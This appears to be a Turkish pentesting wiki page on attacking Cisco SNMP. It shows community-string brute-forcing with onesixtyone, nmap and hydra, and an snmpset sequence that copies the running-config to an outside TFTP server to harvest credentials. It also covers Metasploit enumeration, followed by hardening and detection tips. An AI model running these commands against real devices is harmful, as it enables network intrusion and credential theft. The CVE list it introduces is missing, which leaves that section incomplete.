Cisco SNMP

Reading time: 5 minutes

Cisco Ağlarının Pentestingi

SNMP, genel mesajlar için 161/UDP ve tuzak mesajları için 162/UDP ile UDP üzerinden çalışır. Bu protokol, SNMP ajanları ve yöneticileri arasında iletişimi sağlayan düz metin "şifreler" olarak işlev gören topluluk dizelerina dayanır. Bu dizeler, erişim seviyesini belirler; özellikle sadece okuma (RO) veya okuma-yazma (RW) izinleri.

Klasik—ancak hala son derece etkili—bir saldırı vektörü, topluluk dizelerini brute-force yaparak kimlik doğrulaması yapılmamış bir kullanıcıdan cihaz yöneticisine (RW topluluğu) yükselmektir. Bu görev için pratik bir araç onesixtyone:

onesixtyone -c community_strings.txt -i targets.txt

Diğer hızlı seçenekler Nmap NSE betiği snmp-brute veya Hydra'nın SNMP modülüdür:

nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24
hydra -P wordlist.txt -s 161 10.10.10.1 snmp

SNMP üzerinden yapılandırma dökümü (CISCO-CONFIG-COPY-MIB)

Eğer bir RW community elde ederseniz, CISCO-CONFIG-COPY-MIB (1.3.6.1.4.1.9.9.96) kullanarak çalışmakta olan yapılandırmayı/başlangıç yapılandırmasını CLI erişimi olmadan bir TFTP/FTP sunucusuna kopyalayabilirsiniz. İki yaygın yaklaşım şunlardır:

1. Nmap NSE – snmp-ios-config

nmap -sU -p161 --script snmp-ios-config \
--script-args creds.snmp=private 192.168.66.1

Script, kopyalama işlemini otomatik olarak düzenler ve yapılandırmayı stdout'a yazdırır.

2. Manuel snmpset dizisi

# Copy running-config (4) to a TFTP server (1) – random row id 1234
snmpset -v2c -c private 192.168.66.1 \
1.3.6.1.4.1.9.9.96.1.1.1.1.2.1234 i 1 \    # protocol = tftp
1.3.6.1.4.1.9.9.96.1.1.1.1.3.1234 i 4 \    # sourceFileType = runningConfig
1.3.6.1.4.1.9.9.96.1.1.1.1.4.1234 i 1 \    # destFileType   = networkFile
1.3.6.1.4.1.9.9.96.1.1.1.1.5.1234 a 10.10.14.8 \ # TFTP server IP
1.3.6.1.4.1.9.9.96.1.1.1.1.6.1234 s \"backup.cfg\" \\
1.3.6.1.4.1.9.9.96.1.1.1.1.14.1234 i 4       # rowStatus = createAndGo

Satır tanımlayıcıları tek seferliktir; beş dakika içinde yeniden kullanılması inconsistentValue hatalarını tetikler.

Dosya TFTP sunucunuzda olduğunda, kimlik bilgilerini (enable secret, username <user> secret, vb.) inceleyebilir veya hatta değiştirilmiş bir yapılandırmayı cihaza geri gönderebilirsiniz.

Metasploit araçları

• cisco_config_tftp – aynı MIB'i kötüye kullanarak TFTP üzerinden running-config/startup-config indirir.
• snmp_enum – cihaz envanter bilgilerini, VLAN'ları, arayüz açıklamalarını, ARP tablolarını vb. toplar.

use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 10.10.100.10
set COMMUNITY public
run

Son Cisco SNMP zafiyetleri (2023 – 2025)

Satıcı tavsiyelerini takip etmek, bir angajman içindeki zero-day-to-n-day fırsatlarını belirlemek için faydalıdır:

Sömürülebilirlik genellikle topluluk dizesine veya v3 kimlik bilgilerine sahip olmaya bağlıdır—bunları zorlamanın hala geçerli olmasının bir başka nedeni.

Güçlendirme & Tespit ipuçları

• Düzeltme yapılmış bir IOS/IOS-XE sürümüne yükseltin (yukarıdaki CVE için Cisco tavsiyesine bakın).
• v1/v2c yerine SNMPv3'ü authPriv (SHA-256/AES-256) ile tercih edin.

snmp-server group SECURE v3 priv
snmp-server user monitor SECURE v3 auth sha <authpass> priv aes 256 <privpass>

• SNMP'yi bir yönetim VRF'sine bağlayın ve standart numaralı IPv4 ACL'leri ile kısıtlayın (uzatılmış adlandırılmış ACL'ler risklidir – CVE-2024-20373).
• RW topluluklarını devre dışı bırakın; operasyonel olarak gerekli ise, bunları ACL ve görünümlerle sınırlayın: snmp-server community <string> RW 99 view SysView
• Aşağıdakileri izleyin:

• UDP/161 zirveleri veya beklenmedik kaynaklar (SIEM kuralları).
• CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource olayları, dış bant yapılandırma değişikliklerini gösterir.

• Belirli DoS vektörlerini azaltmak için SNMPv3 günlüğünü etkinleştirin ve snmp-server packetsize 1500 ayarını yapın.

Referanslar

• Cisco: Cisco Cihazlarına SNMP Kullanarak Yapılandırmaları Kopyalama
• Cisco Güvenlik Tavsiyesi cisco-sa-snmp-uwBXfqww (CVE-2024-20373)